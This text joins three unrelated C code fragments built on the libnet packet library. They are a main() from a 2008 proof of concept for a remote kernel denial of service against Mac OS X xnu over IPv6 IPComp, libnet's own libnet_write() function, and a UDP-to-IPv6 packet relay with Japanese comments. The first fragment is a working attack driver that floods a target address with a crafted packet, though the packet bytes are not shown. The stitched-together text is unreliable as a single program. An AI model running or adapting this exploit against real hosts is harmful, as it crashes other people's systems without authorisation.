int main (int argc, char **argv) { char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128]; unsigned int i, ip6_addr[4]; libnet_t *lnsock; printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n" "by: <*****@*****.**>\n" "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); if (argc < 2) { fprintf (stderr, "Usage: %s <dst ipv6>\n", argv[0]); exit (EXIT_FAILURE); } if (get_localip (IPV6_INTERFACE, (unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0) { fprintf (stderr, "* get_localip() failed\n"); exit (EXIT_FAILURE); } if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0) { fprintf (stderr, "* inet_pton() failed\n"); exit (EXIT_FAILURE); } memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr); lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf); if (lnsock == NULL) { fprintf (stderr, "* libnet_init() failed: %s\n", errbuf); exit (EXIT_FAILURE); } inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf); printf ("* local ipv6 %s...\n", ip6_buf); printf ("* attacking %s...", argv[1]); for (i = 0; i < HAMMER_NUM; i++) libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1); printf ("done\n"); return (EXIT_SUCCESS); }
int libnet_write(libnet_t *l) { int c; uint32_t len; uint8_t *packet = NULL; if (l == NULL) { return (-1); } c = libnet_pblock_coalesce(l, &packet, &len); if (c == - 1) { /* err msg set in libnet_pblock_coalesce() */ return (-1); } /* assume error */ c = -1; switch (l->injection_type) { case LIBNET_RAW4: case LIBNET_RAW4_ADV: if (len > LIBNET_MAX_PACKET) { snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): packet is too large (%d bytes)\n", __func__, len); goto done; } c = libnet_write_raw_ipv4(l, packet, len); break; case LIBNET_RAW6: case LIBNET_RAW6_ADV: c = libnet_write_raw_ipv6(l, packet, len); break; case LIBNET_LINK: case LIBNET_LINK_ADV: c = libnet_write_link(l, packet, len); break; default: snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): unsuported injection type\n", __func__); goto done; } /* do statistics */ if (c == len) { l->stats.packets_sent++; l->stats.bytes_written += c; } else { l->stats.packet_errors++; /* * XXX - we probably should have a way to retrieve the number of * bytes actually written (since we might have written something). */ if (c > 0) { l->stats.bytes_written += c; } } done: /* * Restore original pointer address so free won't complain about a * modified chunk pointer. */ if (l->aligner > 0) { packet = packet - l->aligner; } free(packet); return (c); }
int main( int argc, char* argv[] ) { int socket; unsigned char data[1280]; int size; libnet_t *libnet_context; char libnet_errmsg_buf[LIBNET_ERRBUF_SIZE]; //socket = sock_afpacket( argv[1] ); socket = sock_udp( argv[2], strtoul(argv[3], NULL, 10 ) ); if ( socket == -1 ) { fprintf(stderr, "socket error\n"); return 1; } // libnetのコンテキスト作成 libnet_context = libnet_init(LIBNET_RAW6_ADV, NULL, libnet_errmsg_buf ); //libnet_context = libnet_init(LIBNET_RAW6_ADV, argv[1], libnet_errmsg_buf ); if ( NULL == libnet_context ) { fprintf(stderr, "%s\n", libnet_errmsg_buf ); close(socket); return 1; } for(;;) { libnet_ptag_t ptag_udp, ptag_ip6; uint8_t *pbuf; uint32_t payload_len; //afpacketからのデータ受信 //size = recv_packet( socket, sizeof(data), data ); //print_ipv6_header( data ); // UDPデータ受信 size = recv( socket, data, sizeof(data), MSG_TRUNC ); printf("data recieve. "); dump_packet( size, data ); putc('\n', stdout); // UDPヘッダ ptag_udp = libnet_build_udp( (uint16_t)(random()%(65535-49152)+49152), // source port(49152 - 65535) 53, // destination port sizeof(header_udp) + size, // length of UDP pakcet 0, // checksum(autofill) data, // payload size, // payload length libnet_context, 0 ); pbuf = libnet_getpbuf( libnet_context, ptag_udp ); payload_len = libnet_getpbuf_size( libnet_context, ptag_udp ); // IPv6ヘッダ ptag_ip6 = libnet_build_ipv6( 0, // Traffic Class 0, // Flow Label //sizeof(header_ipv6) + sizeof(header_udp) + size, // total length of the IP packet sizeof(header_udp) + size, // total length of the IP packet IPPROTO_UDP, // Next header(UDP) 10, // Hop Limit libnet_name2addr6( libnet_context, SRC_IP, LIBNET_DONT_RESOLVE ), // src ip libnet_name2addr6( libnet_context, DST_IP, LIBNET_DONT_RESOLVE ), // dst ip pbuf, // payload payload_len, // Payload Length libnet_context, 0 ); // 送信データ取得 pbuf = libnet_getpbuf( libnet_context, ptag_ip6 ); payload_len = libnet_getpbuf_size( libnet_context, ptag_ip6 ); // チェックサム計算←IPv6は未対応の模様 //libnet_do_checksum( libnet_context, pbuf, IPPROTO_UDP, payload_len ); printf("data sending. "); dump_packet( payload_len, pbuf ); // データ送信 //libnet_write_raw_ipv6( libnet_context, data, size ); libnet_write_raw_ipv6( libnet_context, pbuf, payload_len ); // 作成データ解放 libnet_clear_packet( libnet_context ); } return 0; }